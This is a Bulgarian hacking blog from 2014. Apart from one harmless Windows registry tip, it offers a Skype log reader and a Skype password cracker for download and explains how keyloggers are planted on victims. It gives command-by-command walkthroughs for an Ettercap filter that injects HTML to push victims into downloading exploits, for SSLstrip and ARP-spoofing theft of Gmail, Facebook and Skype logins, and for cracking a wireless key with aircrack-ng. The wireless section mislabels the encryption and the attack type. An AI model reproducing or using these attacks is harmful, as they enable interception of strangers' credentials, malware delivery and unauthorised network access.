понеделник, 3 март 2014 г.

Проблем с минимизирането на игрите и прозорците

Скоро се натъкнах на един проблем с TP-Link wireless адаптерите, които на 10 сек. те вадят на Desktop. Проблема е от софтуера им и се оправя като дадете Х на програмата после избарете отметката Close и птоблема се решава поне за мен беше така



 Ако не можете да пробвате с регистрите
Start > Пишете regedit > после избирате HKEY_CURRENT_USER > Control Pannel > Desktop
избирате ForegroundLockTimeout  в полето пишете 30d40


Дано това ви помогне ...

вторник, 25 февруари 2014 г.

Програмка четяща логовете в Skype


Много добра програмка позволяваща ви да четете лог-съобщенията. Може да я използвате да четете логовете на висчки потребители влезли от машината.

DOWNLOAD      Пач на Български

Програма за намиране на пароли на Skype



Програмка кракваща пароли в скайп. Ползването е на Ваш риск.

DOWNLOAD

За keylogger програмите


   Тези програмки са изключително популярни сред хакерчетата и най-често се изплозват при физически достъп до машината. С нейна помощ лесно можете да вземете пароли защото тяхната цел е следене на клавиатурните рекгистри/протоколи. Цялата информация се записва на машината в лог файл, като има възможност да се праща и до конфигуриран съсрвър като най често е FTP сървър. Като цяло keylogger програмките представляват конфигуратор които създава ядро което се праща на жертвата. Като най добрия начин е филтриране на HTML кода и подтикване на жертвата да го изтегли. Тъй като голяма част от тези програмки се хващат от антивирусните повечето прибягват към визически достъп и конфигурация при обществени компъютри (интернет зали,офиси и т.н.) Общо взето повечето потребители не знаят или си нямат идея какви могат да бъдат последиците ползвайки чужди компютри и лесно стават жертва. Хора вярваши на идеите като инсталирай програмката за да следиш децата или служителите си какво правят в интернет също стават жертви.
   Как да се предпазим? Използвайте личните си компютри с up to date антивирусна така шансовите драстично намаляват. Възползвайте се от двуфакторните идентификации на системи които позволяват това (facebook, google и т.н.)

събота, 22 февруари 2014 г.

Създаване плугин за Ettercap заместващ HTML код


Здравейте ще ви запозная с още една MITM атака .. За целта ползваме отново BackTrack дестрибуцията и Ettercap , като към него създаваме специален плугин заместващ HTML код. Така сърфиращата жертва лесно можете да я прилъжете да дръпне някой ваш експлойт или вирус.
Създаване на плугина:
  1. Създавате smb.filter файл със съдържание:
          if(ip.proto == TCP && tcp.dst == 80) {
          if(search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");

          msg("zapped Accept-Encoding!\n");
         }
         }
         if(ip.proto == TCP && tcp.src == 80) {
         replace("html код за заместване ", "нов html код");
         replace(
"html код за замесване", "нов html код");
         msg("Filter Ran.\n");
        }

         Пример:
     
    2.   Компилиране на файла - etterfilter smb.filter -o smb.ef
          След компилирането изхода трябва да е такъв или подобен:
                
                    -> Script encoded into 16 instructions.

    3. Стартиране на Ettercap-a
           
               ettercap -T -q -F smb.ef -M ARP /[ипто на жертвата]/ // -P autoadd -i waln0



Практически с тези операции можете да подмените всякакъв html код на жертвата.
Приятно тестване!

Подслушване на мрежа за пароли с Ettercap и SSLstrip


Здравейте в тази публикация ще разясня как става визмането на пароли за логин в различни сайтове ... Лично аз съм го тествал за сайтове като gmail.com abv.bg  skype.com facebook.com (без двуфакторна идентификация)
Това е друг вид MITM атака с която ще ви запозная.Като за начало трябва да имате BackTrack и програми към него Ettercap и SSLstrip.
Ettercap - http://ettercap.github.io/ettercap/
SSLstrip - http://www.thoughtcrime.org/software/sslstrip/
Уверете се че те са ъпдейтнати до последни версии.....

Започваме действайте под руут
  1. Конфигуриране на iptables
     iptables --flush
     iptables --table nat --flush
     iptables --delete-chain
     iptables --table nat --delete-chain
     echo 1 > /proc/sys/net/ipv4/ip_forward 

     iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080   

Тук wlan0  еимето на адаптера през които правим forwarding-a. Тук съм използвал wireless адаптера (wlan0) на моия комп , но можете да ползвате и ethernet адаптерите eth0 eth1 ... и т.н.
Задължително проверете и ifconfig-a имената ..

     2.   Проверка дали всичко е ОК .. iptables -nvL -t nat
     3.   Стартиране на SSLstrip. Влизате в папката кадето сте го свалили и пишете:
            python sslstrip-0.7/sslstrip.py -a -l 8080 
            или ако сте го инсталирали това - sslstrip -a -l 8080
     4.   Стартиране на Ettercap
            ettercap -TqM ARP:REMOTE // // 
            след като сте го стартирали избирате плугин към него remote_browser
 След стартирането на Ettercap проверете дали forwarding-a в /etc/sysctl.conf
които трябва да е така -> net.ipv4.ip_forward = 1 

 Приятно тестване ...

сряда, 19 февруари 2014 г.

Хакване на паролата на Wireless с WAP кодировка


Хакване на този вид кодировка на wireless e доста лесно атрибутите с които трябва да разполагате са : BackTrack и по възможност малко по стар комп или поне wireless картата ви да поддържа хакнатите драйвъри с които ще можете да си настроите компа да подслушава излъчването на сигналите ...

Ето стъпка по стъпка какво трябва да се прави:
  1. Трябва ви инсталиран aircrack-ng - http://www.aircrack-ng.org/ Практически backtrack-a има инсталиран. По добре е да го обновите отколкото да се мъчете да инсталирате новия , а тук ще ви трябват и малко познания и за линукс средите , които мисля да засегна в други теми като базова информация ..
  2. Всички операции трябва да действате под root
  3. Сега отваряте конзолата и пишете
  4. airmon-ng start wlan0 - Тази команда стартира вашия wireless адаптер за работи като подслушвашта система като използва хакнати драйвъри. Не е задължително след старта името на вашето wireless устройство да се кава wlan0 Преди с стартирате командата трябва да проверите в ifconfig-a как се нарича. След правилното изпълнение на командата ще ви маунтне друго устройство mon0 което пак не е задължително да се казва така ... Тези неща трябва да ги проверите много внимателно защото неправилното изпълнение на тази операция няма да даде резултат :)
  5. airodump-ng mon0 - Стартиране на подслушването през новото маунтнато устройство
  6. airodump-ng -c 11 -w do0ms --bssid 74:EA:3A:E3:E7:14 mon0 Филтриране на подслушването и записването му в файл do0ms(може да е какво ти изберете име),            -c 11(подслушване на канал 11), --bssid 74:EA:3A:E3:E7:14(мак адреса на wireless рутера които искаш да вземеш паролата)
  7. aireplay-ng -1 0 -a 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0 Изпращане на пакети за disconnect Като тук -h 00:26:B6:F0:E6:EF е мак адреса на жертвата (лаптоп закачен към рутера на които искате да вземете паролата )
  8. aireplay-ng -3 -b 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0 
  9. aircrack-ng -b 74:EA:3A:E3:E7:14 do0ms-01.cap  Декодиране на паролата
Като цяло този тип атаки се водят "мен ат дъ мидъл".

Успех на тестващите! Ако имате въпроси оставете коментар ..